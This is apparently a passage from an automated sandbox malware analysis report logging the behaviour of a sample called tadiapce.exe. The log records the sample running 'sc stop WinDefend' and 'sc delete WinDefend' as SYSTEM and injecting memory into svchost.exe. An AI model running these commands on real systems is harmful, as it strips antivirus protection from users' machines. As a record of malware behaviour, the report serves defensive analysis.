| Get Environment String | name = HomePath |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PATH |
|
1 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Process #29: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #29 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:24, Reason: Child Process |
| Unmonitor | End Time: 00:01:26, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x394 |
| Parent PID | 0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
878
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 208, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0x9a0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a580000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:31:34 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10932628 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15904049107 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000424 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #30: sc.exe
9
0
| Information | Value |
|---|---|
| ID | #30 |
| File Name | c:\windows\system32\sc.exe |
| Command Line | sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:01:26, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8a0 |
| Parent PID | 0x7dc (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
98C
0x
994
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 98 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\sc.exe | base_address = 0x2d0000 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:31:34 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10932659 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15907162426 |
|
1 |
Process #31: sc.exe
9
0
| Information | Value |
|---|---|
| ID | #31 |
| File Name | c:\windows\system32\sc.exe |
| Command Line | sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:01:26, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9a0 |
| Parent PID | 0x394 (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
9A4
0x
9A8
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 98 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\sc.exe | base_address = 0x2d0000 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:31:34 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10932721 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15912605200 |
|
1 |
Process #33: svchost.exe
62
0
| Information | Value |
|---|---|
| ID | #33 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | svchost.exe |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:02:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4d8 |
| Parent PID | 0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9E8
|
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x50000, size = 367 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x60000, size = 112 |
|
61 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x602104, size = 12 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10000000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10001000, size = 10240 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004000, size = 3584 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10005000, size = 1004 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10005000, size = 512 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10006000, size = 1024 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 26 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 12 |
|
7 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 17 |
|
7 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 16 |
|
45 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004018, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 14 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000401c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 15 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004020, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 20 |
|
6 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004024, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 9 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004028, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000402c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 12 |
|
5 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004030, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 10 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004034, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004038, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000403c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 25 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004040, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 18 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004044, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004048, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 24 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000404c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004050, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 19 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004054, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 13 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004058, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000405c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 27 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004060, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 6 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004064, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004068, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 28 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000406c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004000, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004004, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004008, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000400c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004010, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 21 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040c8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040cc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040d0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040d4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040d8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 16 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004080, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004084, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004088, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000408c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 22 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000409c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040a0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 11 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040a4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040a8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 5 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040ac, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 7 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040b0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040b4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040b8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040bc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040c0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004094, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004074, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004078, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x140000, size = 388 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x150000, size = 40 |
|
1 |
Host Behavior
Module (59)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76b10000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x774c0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x76cd0000 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x76a60000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x76f80000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x771d0000 |
|
1 | |
| Load | NETAPI32.dll | base_address = 0x73c20000 |
|
1 | |
| Get Handle | c:\windows\system32\svchost.exe | base_address = 0x600000 |
|
1 | |
| Get Handle | c:\windows\system32\advapi32.dll | base_address = 0x774c0000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleW, address_out = 0x76b6374d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76b53b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76b6450e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x76b5bbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessHeap, address_out = 0x76b61280 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapReAlloc, address_out = 0x7739ff51 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x77382dd6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenW, address_out = 0x76b5d9e8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x76b5cf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x76b6ed38 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x76b5cdcf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76b52331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x76b62fde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x76b5cac4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentThreadId, address_out = 0x76b5bb80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount, address_out = 0x76b5ba60 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x76b5bb9f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InterlockedCompareExchange, address_out = 0x76b5bb92 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Sleep, address_out = 0x76b5ba46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InterlockedExchange, address_out = 0x76b5bf0a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x76b63d01 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumKeyExW, address_out = 0x774d46c8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyExW, address_out = 0x774d468d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryValueExW, address_out = 0x774d46ad |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x774d469d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryInfoKeyW, address_out = 0x774d46e7 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitializeSecurity, address_out = 0x76cf7259 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x76d19d0b |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoSetProxyBlanket, address_out = 0x76ce5ea5 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoUninitialize, address_out = 0x76d186d3 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitializeEx, address_out = 0x76d109ad |
|
1 | |
